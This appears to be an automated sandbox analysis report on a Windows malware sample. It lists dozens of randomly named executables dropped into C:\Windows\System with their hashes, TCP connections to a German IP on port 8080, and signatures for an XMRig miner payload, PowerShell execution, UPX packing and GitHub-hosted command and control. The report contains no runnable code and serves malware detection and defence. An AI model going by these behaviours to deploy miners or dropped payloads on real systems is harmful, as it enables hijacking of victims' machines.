C:\Windows\System\BjAfhPX.exe

C:\Windows\System\BjAfhPX.exe

C:\Windows\System\vzQJVxN.exe

C:\Windows\System\vzQJVxN.exe

C:\Windows\System\rGOWwTJ.exe

C:\Windows\System\rGOWwTJ.exe

C:\Windows\System\bQcKEwD.exe

C:\Windows\System\bQcKEwD.exe

C:\Windows\System\EjkuJUF.exe

C:\Windows\System\EjkuJUF.exe

C:\Windows\System\IketDLA.exe

C:\Windows\System\IketDLA.exe

C:\Windows\System\kvmmZIM.exe

C:\Windows\System\kvmmZIM.exe

C:\Windows\System\RKWQaFx.exe

C:\Windows\System\RKWQaFx.exe

C:\Windows\System\UWQIDUD.exe

C:\Windows\System\UWQIDUD.exe

C:\Windows\System\zjsCqGv.exe

C:\Windows\System\zjsCqGv.exe

C:\Windows\System\gFkUfbE.exe

C:\Windows\System\gFkUfbE.exe

C:\Windows\System\xbfUBbx.exe

C:\Windows\System\xbfUBbx.exe

C:\Windows\System\RozxnHi.exe

C:\Windows\System\RozxnHi.exe

C:\Windows\System\dVnQKfT.exe

C:\Windows\System\dVnQKfT.exe

C:\Windows\System\BbSGRDL.exe

C:\Windows\System\BbSGRDL.exe

C:\Windows\System\GTDPsdU.exe

C:\Windows\System\GTDPsdU.exe

C:\Windows\System\ljRDlGv.exe

C:\Windows\System\ljRDlGv.exe

C:\Windows\System\wfnKWry.exe

C:\Windows\System\wfnKWry.exe

C:\Windows\System\QTtvbRv.exe

C:\Windows\System\QTtvbRv.exe

C:\Windows\System\ITqwgDo.exe

C:\Windows\System\ITqwgDo.exe

C:\Windows\System\WqEKBWs.exe

C:\Windows\System\WqEKBWs.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2020-0-0x000000013FBB0000-0x000000013FFA6000-memory.dmp

memory/2020-1-0x00000000000F0000-0x0000000000100000-memory.dmp

\Windows\system\XiSXgWX.exe

MD5 b172439879271b234336ccba008b4aad
SHA1 1491302468c90c0c6d45f28182cfc706f80d2fea
SHA256 318f70a0d560c64eab91c1e175ef8cc79e74128d5d1c34071806f98615e7bc83
SHA512 13c641a3ff3802eee8d94aa7feab46c291fd08f33b98ef5b0cbac046ed688f99d4a2ef5ebaf3994b14f843dddfb287c7362d16e1494b2ab59e35344b6bdf87cc

C:\Windows\system\tBWhVgW.exe

MD5 958dcc3249c05dfad1013cb2d11f07b7
SHA1 850a10e97ee2b99e670f9523f9c5018ab26c9100
SHA256 3e10bd94a9706122ed4a1564e4d8558a6efa0dc572566058d1c4e536962ad5ee
SHA512 5f3cb8813f72559a4569b6423447165d406bacbb864945e8c83820f18ac37ab3a8e59ff60e2f56080c1b273f2ea3ebbb66a59a6f384e1fa0a19f62f314bb9f36

C:\Windows\system\AJHBYeR.exe

MD5 f1b778faace3ab6a407b0f44e4771e6d
SHA1 6beee9026207141809f63c93c302c81e86356a52
SHA256 1bb7840c88e60cb50eb3c0144d5d7a9c5d942ca6e9e92a5c84bcbd4c5e84d3da
SHA512 c7c508c8521f8f4dd62a30f016e02bd1ee66da76c1cd1098eaa657b4024b2b5642a55e2d04f5bf7ad681bdc6d1817350cfd43bf275963bd827b7dd3beb304e2a

C:\Windows\system\sgZrsWT.exe

MD5 5113c309f9b6814e9439a46d29748b1b
SHA1 f5bbf1df1a7f170c3edd6c5a7a544a438044134b
SHA256 85cdc9523e6453ccc1e50d30e7726123c72e9178dc8db5c68a5b7c5490371960
SHA512 7351ebd831e8b2ea3d5757fa6b36fd71ecd4e018546a2c89b48f8dc5e8cdcddf4df6e36135b3b64080e72daccb253403781254d0df9f6b7d1a104299257551f0

memory/2020-16-0x0000000002FB0000-0x00000000033A6000-memory.dmp

\Windows\system\bczcFtN.exe

MD5 cb1165535d91ec3134374a6703c811c6
SHA1 366a31d1b2770ce7790144d26cad0fac50e9b304
SHA256 5cd39c90f24a5dbe3a1f42596280085a511a15920939464ae97268ec0ecf1ff6
SHA512 948c9429641f1d6ce311ebb0ae7867ced20c0e4bc645c31f3d924d2da1e337a4811702b8269d857358039a50149cfad2aa70f225e4b509e6415e6bd967474a11

C:\Windows\system\oPqtWIx.exe

MD5 80ca952827a892c43c5c2ab977811ffe
SHA1 59cc9723a6af738086952998f000bb3a965ceb9c
SHA256 24795950e06ee042c7bd206fc7ba66c9a6996ebd400aa37ff6ab25f992346488
SHA512 ff6c80e1a245ffaf94a323e3e99ca2c4cc873172f6f8c1ec36294c6e0064292b7173378659e1704a738f169d8f569db88de412a4d63dd8e82fa1bf3c52a16195

C:\Windows\system\NbUAmUl.exe

MD5 4d214cbb4f5706da669c3e83dc23ccd7
SHA1 676d714106544f972d9a5235aec75bf0e829270d
SHA256 f73e7aaf1e03242291035059b36a3c31577b310a7b73472e59bdaf8b5ba0acd9
SHA512 19ad039f699b914cc2484b421a5589f0bef7a2b44c3b02f434a3dc4b950b0bdd95564802b84d198c660a5e40eaa29e89c0398afae7a4bb236d11b71a02a6da13

C:\Windows\system\zrmsoGV.exe

MD5 a03da238e4c539a494aef902772cc368
SHA1 f80933f7f0bd3729945a4ecf60d4b9872b94588e
SHA256 463cde16005df1d05dc0b8c4f28edb312ff35bedb521921734786f3fd08c6c90
SHA512 22bef0aa3ced1037be09ad78c2b5179fe9107667c50b77c09fc1456144ed337a83b123a7bc925e56f049726698e3524c986242c7dc8a39f8637f81dabe239ee9

C:\Windows\system\rTkPagf.exe

MD5 48a641bb2514625ea2872dcdf99a1fe9
SHA1 8846167a8fa3a3f13d3f98437cfa04e28335dafc
SHA256 3b3495de6134a6a29b8bcad95cb9162be1682550ee7272d6ea4ed325877a9a7a
SHA512 f02e1a1d68c17cbb2771cef5aa98de31640cf6a0a1c717cbf921b6c9d82fb2d974f6e6f536033fca7186f4a8744595f957bc757df0b82c1dc58481c685ad7659

C:\Windows\system\UbLpRbF.exe

MD5 f4d1859c15eb9dea1b1a104b1bb093a5
SHA1 0c0f71d1413ba1246cb96b76e544b3c9dd8ead5e
SHA256 b79b2a9b2da3e0a97ec691a0fad969537dfb9eaa809a13ac8507e8ce05628c34
SHA512 c065dabbd9d3ea37a36605049774c30ededddfcb946aa28599388028d862947e0c519b9f7380a1937e46401ee646fdbe4f0c62ac20b49ebcd24c905c4aa0b2df

C:\Windows\system\PdOWNLu.exe

MD5 89bbec86301afe5e5eb41164ccc2929f
SHA1 0e93c0252830b9a298df8987fc9366b090f5f5cd
SHA256 85fc935146b285647b9d940565e201b8bc50e3e63a8f02555225388159d5fcd0
SHA512 6570e6303eefb0a46e99b6dd448225b937750f140694c6a178d6b46ba608a62f24206adfc673483836ef4831ff4e67823c537b083cb0168eb181b996ac171a81

memory/2980-151-0x0000000001D90000-0x0000000001D98000-memory.dmp

C:\Windows\system\euBITjP.exe

MD5 b5aacf2212d99deb226a6fa606ff5649
SHA1 c5e930a79bc8b6fba7d520754b8ec2e9c74ecbf9
SHA256 5dad54c1e1900a5ff9991fda976f3f31e44a953dd1c34e2a110c1c9d44d2316e
SHA512 b835458e7db7635eb690a105c50411496b3bea9862e0a70aa1f2c9bf6d2f8d19f9f82b00b9cc2c1b4cc60d328441a87e3aba75292856edcb5496dcbe44cfee2f

C:\Windows\system\rhjfoqW.exe

MD5 8ba7253b007fee278df7fe3f2e58bec3
SHA1 bfbe9cbfa4e64f841f0c00b0d45b775215614594
SHA256 e65391c8294ead5a60a621ea4bf49d078f61ad7fb7f60bdabbdb9c516310b3c1
SHA512 bfbdb879e16fe4b067aa6ff28dec243e9cd236af5721657e172ed736f5296766048327e8c9f7dccfaecc37ac1882862b8c41182f88a4b37c7397bbe6debc8703

C:\Windows\system\CzutKvq.exe

MD5 30c97255fa952a2b2e7fd3b341306d73
SHA1 2b0d2a37848ec64f28092bff3303206a281cf782
SHA256 021aa0cb6e3d8b992dcf24760615a55615244799eb1eb0c6a2ebbbb183b64284
SHA512 8c7b63164bc573f100a3d7249af4af6f479cea6f897a3554cb7ff338ef003171a551cc9d81f2a630ef98812c4a275830be76061d9d7f811e9cd5651b6465be78

C:\Windows\system\ezlYgRK.exe

MD5 a646d793073ca4621c16198d0c0fdca7
SHA1 8d88add4829f93fa88999fd5a49f9e0918f1f15a
SHA256 4033bf0f276304a65ae6b01b8e7bd153cdf80d12b4fd45b76522592bdd21c0f8
SHA512 fee4fd1c95a41fed3ba54e50fb253bb7642a0731e80b45da8c219820b6ed62495a29ee02ed55577cbde65a8b9ce2e315ddd50754fe3ccb2da35d9ab34e6cb099

C:\Windows\system\AVceWtm.exe

MD5 57268a7fc7923d30773d03e1df570e48
SHA1 db951e936cfd109a0f87c8a206679a912b3afcd7
SHA256 9bf0945eb07318ff20fa4393b7e4207debd5200d7220f02e07224921f6729a7f
SHA512 05c6cd98002086cb15abe94acc058054f1a397b976ff1f0886a8722f7c187e7cb2313ef4b1c75fb01be6392064e5f870a8ca689fd3b9e37746ddb20686df9511

C:\Windows\system\CwfhlQm.exe

MD5 b15123b0a787e9d2213c47c080b04b4a
SHA1 296508fcb4a3db1ff3f0b17544dd6072f9b76b2a
SHA256 e203c6576e8d6ef3b80c88888ef539ca763841e927d3591c5119a3eb59c6bed1
SHA512 839019af0c68c14ce6fe3c11db12dea5e7a1ae348464865f1500929a4bf77296242d3db271f5051c94ed05f1ab20e152a3541d910c815416321e064f205b9cd9

C:\Windows\system\LSOQmCy.exe

MD5 4f0c0c04d911e3621c55db04f62d1d5c
SHA1 8a370e2f82bed2fc6affe918f7013220b859ae37
SHA256 326a1cb2ad881df9463180f8dbfe217492597a74723145f9c7eafa2419ea1414
SHA512 44798f679da070f8648ef836f4aa7d2fd7c30101c4a73b3407c2aa12f9593c532d2aae8e9515207c9fe0ded7683d618f1619ab88c9ca1a202df48f43d4dae478

C:\Windows\system\eQWVpHH.exe

MD5 8eefbddfe23a5edd1dae6df6a0f3a403
SHA1 04d7307a26a9d6a869f0c43e5c4efb9f91ce97d3
SHA256 77472ec92e6361029c9d49721892da33ef4346a80e1ced51b0dd1fd354cf42fe
SHA512 83f5b54296d45d0a8de8d08ce7e98c05b9cf283c98883a7644690d7d9e7d31897125285ce27b3fa10b08b11cbe85fb010bc74b57ff9856953672c583a12640df

C:\Windows\system\HDEHqqV.exe

MD5 a1bae900764bcf6db648987570a6431f
SHA1 9160bbb1daeb245d77232b362063827a9a7226b9
SHA256 b9393bbe79f18b65debfff4181b1ac729671e9f521bdeb9ef8579e372ec8db34
SHA512 123f4f4bce89d1310b77f0d76d75dcab12d787295f35a462f1a706881a8926c5fc7a289158530f71f6f7f890235eddeeba508bcf237f8afe91d1f39eb19068ee

C:\Windows\system\NRPfLOi.exe

MD5 d864721f0e6c895f3831b8fdb640c3da
SHA1 16d9024126ff4cc99e0e218f4f99dd9f49664409
SHA256 2fd0dce17907f890675f18e07a6f7e311c9c72f47efd9aac6d101e9c9dd78ca9
SHA512 8ff4caa5edf171acba9cbc07f13ac45a45ba851283986004177bf7d157cb91a6426a3ad5fa7634c918816e3442c2dbd403b06a6953343365c4f3d41a9dc5ff79

C:\Windows\system\hnWqhUq.exe

MD5 812a9d35f468cacb73fa5b07581b1fa9
SHA1 40cb359f1d0317776bedd799da3f8db14a8d1697
SHA256 2d203da88f794ef24e45f0278bd7e9fbb191ba208bb0641c674cc29dc1d2aca7
SHA512 d8287d8f358baad475f2e5a3bd51992cc01a026556522123a2f3f1cf834d5c3cfe7e102e4df35631e57bc959c9727771593cbf7496e90e4e3bd06de5a5ea4485

C:\Windows\system\ljOhnSW.exe

MD5 14362e31a281c497cc6585165d4588d0
SHA1 cc469afb2d36b9c732cbe41c4a9fa06e48dc7f93
SHA256 8e3a3261446f80b8b66536382e94abd4509a591ca6c69aa3822af4de30bc14cc
SHA512 87fb9da6fca90858fc6c63db2716dcc5a5ab04a668dea582edc672e394c12b729db22af28844c721966c82a27e8010b2acea57e2ca1ae34af0f45133e619db35

memory/2980-143-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

C:\Windows\system\TSjYYsR.exe

MD5 41c84dad8abdaa3e730b4de2fecce9bc
SHA1 74f0447a50ac61ca6dc4f763470cce59e5011490
SHA256 42c43b6a230539c0456c71c454c6c866c78fab907de737aaf631595b6ecf8dec
SHA512 d22d10af9da7443937debbf26a0d89590d42d698496470d1a281c5a223ca2121dcda24c2e9221f5cdaf0caccb318697395f20296a4f2a8c2173199858dadac8c

C:\Windows\system\EudHpZR.exe

MD5 8e12c30acfb9360f1521cc7e351a1f0a
SHA1 098a5f384483f1d953ffd1a326f37cdf098a9c68
SHA256 215e5e3443dae118aeef89b380df5d03cf1bbf6283d9dbaa99d5a081bf67448f
SHA512 869782ba9b5bce90c40e1a746317396b3f893fb3c50f917dff618fe1fb033a9b8f56581c97f0961321a385cf9a2363722f4a787067e6ed83c19aef45de2a6464

C:\Windows\system\HyXCoMx.exe

MD5 f5e11e571b81fa1132d6ae785fb8ea33
SHA1 053d92d0c492acc9291d2b823cbb105487ec7de2
SHA256 28f05d92cb6133a2d6e5e3d14f9cb28a3f0d20bc4bd73e66b74f73f3f9f3ae85
SHA512 98f7accabc2a72d7f267570eb855c1306a28eb1f7cc6f264a96419426344f1f2282d9ebd8ffac1ac42ec9337f4000c3fcc9b4468e4baaa3a45ef0df9ac521e8f

\Windows\system\ljPjhmS.exe

MD5 6fd506e0f1a137e719eac2e53eb43716
SHA1 00b55e895cb3ce909ef20060bc27ed45dda809b4
SHA256 096e64da59c7d137920ba823151037ece4c74aadd95cdf87c12564b12746f8dd
SHA512 215ac893a41b11fedb767acc5c7e5055e78c34b32374e8bcad3762eb5cd679df6d34784309068bbb690695943ed5210652b53785e198796b32d55e0880fc48b1

C:\Windows\system\QAESDrk.exe

MD5 722a76b1cffaf3164a1a29f00a911b5d
SHA1 9b5cd3ecc585e218a09733640b0fce2d64ad8038
SHA256 5ac270e0df2e7b1a75878a467a8832a47ce56878fbe516728d62f305f330d841
SHA512 98710f1564409eb2c49f7ac269b602ac410895730166118a8670eeca20db0307b900c521f86be6b91911959fd016e2d118e966d7d1d27d46b9384b00b8a4d44d

C:\Windows\system\FKbhKNw.exe

MD5 715c68adbb26ff654cd8f1f4e1552824
SHA1 8c6a1352f30bc068ccbffb98e061dc277308b17c
SHA256 7a16ff79cfb557f0ea9f1d2f312a0a467a429f7025de716049df385f91629853
SHA512 a057ae0b4830388455c4a620aa2e62c789fd0a48b1c586a54efe36c8bc6bab597d2cfdd61df44610e72e713dc0c1665c5090af5c0736ac56c176b30564596c5c

memory/2020-212-0x000000013F6B0000-0x000000013FAA6000-memory.dmp

memory/2464-211-0x000000013F260000-0x000000013F656000-memory.dmp

memory/2020-215-0x0000000002FB0000-0x00000000033A6000-memory.dmp

\Windows\system\dMXfEPy.exe

MD5 766776968b49e94aa147533fb55b5d6d
SHA1 d8ce66cbedcd045e773d73d0539275d75603115b
SHA256 155425ba83b5cdc0169821b091856dbef901ab7e0a4bab64f4345a3e2def6a62
SHA512 eeb3b467c534befccfe502469d4a8a1654caf4c13be9b661494953915e7a8c7056436e24a3da4e052e7bdd47adaa6648af36e6fc536e184da7beb439b321ffc0

memory/2020-220-0x0000000002FB0000-0x00000000033A6000-memory.dmp

memory/2020-222-0x0000000002FB0000-0x00000000033A6000-memory.dmp

memory/1764-221-0x000000013FDC0000-0x00000001401B6000-memory.dmp

memory/1676-219-0x000000013FE40000-0x0000000140236000-memory.dmp

memory/2020-218-0x0000000002FB0000-0x00000000033A6000-memory.dmp

memory/2460-216-0x000000013FB70000-0x000000013FF66000-memory.dmp

memory/2440-213-0x000000013F6B0000-0x000000013FAA6000-memory.dmp

C:\Windows\system\bBuzmaY.exe

MD5 1ab6bd6a0f3c79d0c3a97199dac68b60
SHA1 d390f9375da2abb95ffea5166bac0166eeb5a501
SHA256 93b2aa6bb40bc83129c4868fa2b264e9724970cbeedf30a6479c5ece04956b54
SHA512 4cf43759e1336c137fbfaa05c34a2fa5727d89ecaae73d92f3f4c85115e3d892816dbba27bc68f4613b8f809e5c6498146e131325144510bdd65bae4c522aad5

C:\Windows\system\IzGIifB.exe

MD5 e0e91ea2495fa6902e7954066f9f19a0
SHA1 5e679121d678ed216bb20941e23dcd6d2e1d62a8
SHA256 c975634c38bef86f11b2c4801a4af1d3165e6898a0b8549a7c305da2b88e212c
SHA512 f8ba468e3446c5967f92dc50e1639ad180bf2a0e5d1ca11e342dc7978f63121ddd3adbca7e92b53089c21db6a00370c04224113850b444df81efe085d868e4b2

\Windows\system\YkCuwWO.exe

MD5 6a36a3abb5a1354193bdb0ae4e8b3411
SHA1 77a9e4aee16eff8329126613e00e258beedcd39c
SHA256 89cd1ffeec03010e5a523d82675421585c150bf1b3c04df14248cd493d864a51
SHA512 bfc0a14e176fd91605879fbd07d222c7d9dcc528a897e9c5c864e1d70513a501abbffb5338cf35241b4f4277940b6d555c071a89e04b9b3f0116752efc613643

\Windows\system\ekCFyxy.exe

MD5 20b3625daa452277b6526c440c2323ed
SHA1 8a74d1a146f79daa62fabbe12f85574b5a489977
SHA256 e376383d217e7c60badd54fc9fc1c811cc177e4133c1c5f9a2057e47d50809dd
SHA512 f06c7d61d46d60e27b09ae9e2df8a8ea07ac5fd73fb93ad90577c6a744c804f8d462912b8fb9cee617b342a228c72aba9e8ff87e94f90c3e48f8dd99bd047a2d

memory/2020-197-0x0000000002FB0000-0x00000000033A6000-memory.dmp

memory/2020-208-0x000000013F260000-0x000000013F656000-memory.dmp

memory/2020-226-0x000000013F6F0000-0x000000013FAE6000-memory.dmp

memory/2708-225-0x000000013FB80000-0x000000013FF76000-memory.dmp

memory/2604-207-0x000000013FED0000-0x00000001402C6000-memory.dmp

memory/2020-206-0x0000000002FB0000-0x00000000033A6000-memory.dmp

memory/2632-204-0x000000013F360000-0x000000013F756000-memory.dmp

memory/2776-203-0x000000013FA10000-0x000000013FE06000-memory.dmp

memory/2020-202-0x0000000002FB0000-0x00000000033A6000-memory.dmp

memory/2628-201-0x000000013F6F0000-0x000000013FAE6000-memory.dmp

memory/2664-200-0x000000013FDA0000-0x0000000140196000-memory.dmp

memory/2020-198-0x000000013F360000-0x000000013F756000-memory.dmp

memory/1936-193-0x000000013F8E0000-0x000000013FCD6000-memory.dmp

memory/2020-6708-0x0000000002FB0000-0x00000000033A6000-memory.dmp

memory/2632-7280-0x000000013F360000-0x000000013F756000-memory.dmp

memory/2440-7305-0x000000013F6B0000-0x000000013FAA6000-memory.dmp

memory/2464-7331-0x000000013F260000-0x000000013F656000-memory.dmp

memory/2604-7321-0x000000013FED0000-0x00000001402C6000-memory.dmp

memory/2628-7292-0x000000013F6F0000-0x000000013FAE6000-memory.dmp

memory/1936-7334-0x000000013F8E0000-0x000000013FCD6000-memory.dmp

memory/2708-7346-0x000000013FB80000-0x000000013FF76000-memory.dmp

memory/2664-7345-0x000000013FDA0000-0x0000000140196000-memory.dmp

memory/1676-7344-0x000000013FE40000-0x0000000140236000-memory.dmp

memory/2460-7341-0x000000013FB70000-0x000000013FF66000-memory.dmp

memory/1764-7340-0x000000013FDC0000-0x00000001401B6000-memory.dmp

memory/2020-7367-0x0000000002FB0000-0x00000000033A6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 12:11

Reported

2024-06-13 12:14

Platform

win10v2004-20240508-en

Max time kernel

67s

Max time network

55s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\PNcDCAh.exe N/A
N/A N/A C:\Windows\System\rHyXYGa.exe N/A
N/A N/A C:\Windows\System\aIawYab.exe N/A
N/A N/A C:\Windows\System\LtZdfXc.exe N/A
N/A N/A C:\Windows\System\bIutWCa.exe N/A
N/A N/A C:\Windows\System\evMSfni.exe N/A
N/A N/A C:\Windows\System\VAZcxOe.exe N/A
N/A N/A C:\Windows\System\aklPCYb.exe N/A
N/A N/A C:\Windows\System\Mptmuaf.exe N/A
N/A N/A C:\Windows\System\WFoYxlD.exe N/A
N/A N/A C:\Windows\System\MguZDUI.exe N/A
N/A N/A C:\Windows\System\JmaqElb.exe N/A
N/A N/A C:\Windows\System\IcNTnII.exe N/A
N/A N/A C:\Windows\System\ClrZQtV.exe N/A
N/A N/A C:\Windows\System\anrXFfS.exe N/A
N/A N/A C:\Windows\System\qlMqAzw.exe N/A
N/A N/A C:\Windows\System\LqrMDqM.exe N/A
N/A N/A C:\Windows\System\erHWPee.exe N/A
N/A N/A C:\Windows\System\DImGUCE.exe N/A
N/A N/A C:\Windows\System\DNdauNW.exe N/A
N/A N/A C:\Windows\System\NkkoPGl.exe N/A
N/A N/A C:\Windows\System\EQjETqy.exe N/A
N/A N/A C:\Windows\System\dTxFCFr.exe N/A
N/A N/A C:\Windows\System\PbkTAmO.exe N/A
N/A N/A C:\Windows\System\bugHoBV.exe N/A
N/A N/A C:\Windows\System\PDpaLsk.exe N/A
N/A N/A C:\Windows\System\fPflDOk.exe N/A
N/A N/A C:\Windows\System\Ndxypar.exe N/A
N/A N/A C:\Windows\System\ZNqgEfG.exe N/A
N/A N/A C:\Windows\System\CBTzxEr.exe N/A
N/A N/A C:\Windows\System\rNIdeQm.exe N/A
N/A N/A C:\Windows\System\krmDWqP.exe N/A
N/A N/A C:\Windows\System\xLDgFBL.exe N/A
N/A N/A C:\Windows\System\UlnEnPJ.exe N/A
N/A N/A C:\Windows\System\FIRRAjH.exe N/A
N/A N/A C:\Windows\System\ToSsbMy.exe N/A
N/A N/A C:\Windows\System\QRZjqvf.exe N/A
N/A N/A C:\Windows\System\jAXIHOM.exe N/A
N/A N/A C:\Windows\System\cwKVXJj.exe N/A
N/A N/A C:\Windows\System\LXHCQJL.exe N/A
N/A N/A C:\Windows\System\wPEdiLF.exe N/A
N/A N/A C:\Windows\System\YfEKOhv.exe N/A
N/A N/A C:\Windows\System\jQxlnrB.exe N/A
N/A N/A C:\Windows\System\eNQMdBI.exe N/A
N/A N/A C:\Windows\System\wdLBrQh.exe N/A
N/A N/A C:\Windows\System\VsRuFOV.exe N/A
N/A N/A C:\Windows\System\qJinpNc.exe N/A
N/A N/A C:\Windows\System\oZwqcgz.exe N/A
N/A N/A C:\Windows\System\gpaCyUh.exe N/A
N/A N/A C:\Windows\System\ImHeApT.exe N/A
N/A N/A C:\Windows\System\bmdfCev.exe N/A
N/A N/A C:\Windows\System\rLYvdVH.exe N/A
N/A N/A C:\Windows\System\LnBfYKk.exe N/A
N/A N/A C:\Windows\System\lDOrwTu.exe N/A
N/A N/A C:\Windows\System\UHOZlgg.exe N/A
N/A N/A C:\Windows\System\xYBFclo.exe N/A
N/A N/A C:\Windows\System\VuZGgIw.exe N/A
N/A N/A C:\Windows\System\xrQLkgA.exe N/A
N/A N/A C:\Windows\System\YZVivKy.exe N/A
N/A N/A C:\Windows\System\kqepxZy.exe N/A
N/A N/A C:\Windows\System\KIyGpMy.exe N/A
N/A N/A C:\Windows\System\RXlvbdT.exe N/A
N/A N/A C:\Windows\System\XVaSoXf.exe N/A
N/A N/A C:\Windows\System\WGHDbhs.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\LVChRpQ.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\iQAIwQT.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mzmnegy.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VsRuFOV.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BXeAlZv.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xYBFclo.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PIOlkct.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YehEbBJ.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XIVTqwH.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fxEQhFi.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WulGwMH.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RRhbIdQ.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sfpivcK.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xxagBNd.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ywaMZxV.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QlkqEPP.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZYIblZa.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
